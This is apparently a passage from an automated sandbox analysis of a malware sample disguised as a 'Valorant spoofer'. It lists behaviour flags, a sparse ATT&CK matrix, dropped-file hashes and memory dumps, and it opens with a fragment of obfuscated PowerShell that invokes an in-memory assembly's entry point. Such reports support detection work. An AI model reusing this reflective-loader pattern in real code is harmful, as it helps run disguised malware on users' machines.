$JRcFH::$riXOJ2($Tzvxz);$Ryexv = $RCFAd.EntryPoint;$Ryexv.$riXOJ0($null, (, [string[]] ($rkzMI)))
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Valorant spoofer.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Valorant spoofer.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xlkvae3r.gx1.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll
Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll
Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll
Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
memory/60-247-0x0000020E74BE0000-0x0000020E74C07000-memory.dmp

Filesize
156KB

Download
memory/60-241-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/60-237-0x0000020E74BE0000-0x0000020E74C07000-memory.dmp

Filesize
156KB

Download
memory/512-245-0x0000022299260000-0x0000022299287000-memory.dmp

Filesize
156KB

Download
memory/512-249-0x0000022299260000-0x0000022299287000-memory.dmp

Filesize
156KB

Download
memory/512-248-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/584-225-0x0000029CBCDC0000-0x0000029CBCDE1000-memory.dmp

Filesize
132KB

Download
memory/584-234-0x0000029CBCDF0000-0x0000029CBCE17000-memory.dmp

Filesize
156KB

Download
memory/584-227-0x0000029CBCDF0000-0x0000029CBCE17000-memory.dmp

Filesize
156KB

Download
memory/584-229-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/664-239-0x0000014032240000-0x0000014032267000-memory.dmp

Filesize
156KB

Download
memory/664-233-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/664-230-0x0000014032240000-0x0000014032267000-memory.dmp

Filesize
156KB

Download
memory/684-250-0x0000011BA79D0000-0x0000011BA79F7000-memory.dmp

Filesize
156KB

Download
memory/684-251-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/952-243-0x000001EA2F520000-0x000001EA2F547000-memory.dmp

Filesize
156KB

Download
memory/952-235-0x000001EA2F520000-0x000001EA2F547000-memory.dmp

Filesize
156KB

Download
memory/952-240-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/1068-256-0x000001B628590000-0x000001B6285B7000-memory.dmp

Filesize
156KB

Download
memory/1068-310-0x000001B628590000-0x000001B6285B7000-memory.dmp

Filesize
156KB

Download
memory/1068-257-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/1088-263-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/1088-314-0x0000023B2D380000-0x0000023B2D3A7000-memory.dmp

Filesize
156KB

Download
memory/1088-261-0x0000023B2D380000-0x0000023B2D3A7000-memory.dmp

Filesize
156KB

Download
memory/1096-319-0x0000020078BD0000-0x0000020078BF7000-memory.dmp

Filesize
156KB

Download
memory/1096-260-0x0000020078BD0000-0x0000020078BF7000-memory.dmp

Filesize
156KB

Download
memory/1096-262-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/1200-268-0x00007FFA7F050000-0x00007FFA7F060000-memory.dmp

Filesize
64KB

Download
memory/1200-267-0x000001EB83D70000-0x000001EB83D97000-memory.dmp

Filesize
156KB

Download
memory/1200-322-0x000001EB83D70000-0x000001EB83D97000-memory.dmp

Filesize
156KB

Download
memory/1232-328-0x000001CDF5460000-0x000001CDF5487000-memory.dmp

Filesize
156KB

Download
memory/2000-148-0x0000016D069A0000-0x0000016D069B0000-memory.dmp

Filesize
64KB

Download
memory/2000-147-0x0000016D069A0000-0x0000016D069B0000-memory.dmp

Filesize
64KB

Download
memory/2000-137-0x0000016D06AB0000-0x0000016D06AD2000-memory.dmp

Filesize
136KB

Download
memory/2000-150-0x00007FFABEFD0000-0x00007FFABF1C5000-memory.dmp

Filesize
2.0MB

Download
memory/2000-151-0x00007FFABD680000-0x00007FFABD73E000-memory.dmp

Filesize
760KB

Download
memory/2000-152-0x0000016D069A0000-0x0000016D069B0000-memory.dmp

Filesize
64KB

Download
memory/2000-149-0x0000016D069A0000-0x0000016D069B0000-memory.dmp

Filesize
64KB

Download
memory/2000-156-0x00007FFABEFD0000-0x00007FFABF1C5000-memory.dmp

Filesize
2.0MB

Download
memory/2000-153-0x0000016D069A0000-0x0000016D069B0000-memory.dmp

Filesize
64KB

Download
memory/2000-154-0x0000016D069A0000-0x0000016D069B0000-memory.dmp

Filesize
64KB

Download
memory/2780-222-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2780-220-0x00007FFABEFD0000-0x00007FFABF1C5000-memory.dmp

Filesize
2.0MB

Download
memory/2780-221-0x00007FFABD680000-0x00007FFABD73E000-memory.dmp

Filesize
760KB

Download
memory/2780-210-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2780-208-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3876-180-0x000001B439640000-0x000001B439650000-memory.dmp

Filesize
64KB

Download
memory/3876-185-0x00007FFABEFD0000-0x00007FFABF1C5000-memory.dmp

Filesize
2.0MB

Download
memory/3876-192-0x000001B43BE80000-0x000001B43BED0000-memory.dmp

Filesize
320KB

Download
memory/3876-181-0x000001B439640000-0x000001B439650000-memory.dmp

Filesize
64KB

Download
memory/3876-182-0x00007FFABEFD0000-0x00007FFABF1C5000-memory.dmp

Filesize
2.0MB

Download
memory/3876-183-0x00007FFABD680000-0x00007FFABD73E000-memory.dmp

Filesize
760KB

Download
memory/3876-184-0x000001B439640000-0x000001B439650000-memory.dmp

Filesize
64KB

Download
memory/3876-193-0x000001B43BF90000-0x000001B43C042000-memory.dmp

Filesize
712KB

Download
memory/3876-207-0x00007FFABD680000-0x00007FFABD73E000-memory.dmp

Filesize
760KB

Download
memory/3876-206-0x00007FFABEFD0000-0x00007FFABF1C5000-memory.dmp

Filesize
2.0MB

Download
memory/3876-194-0x000001B43C220000-0x000001B43C3E2000-memory.dmp

Filesize
1.8MB

Download
memory/4128-160-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4128-158-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4452-205-0x0000021C66350000-0x0000021C66360000-memory.dmp

Filesize
64KB

Download
memory/4452-204-0x0000021C66350000-0x0000021C66360000-memory.dmp

Filesize
64KB

Download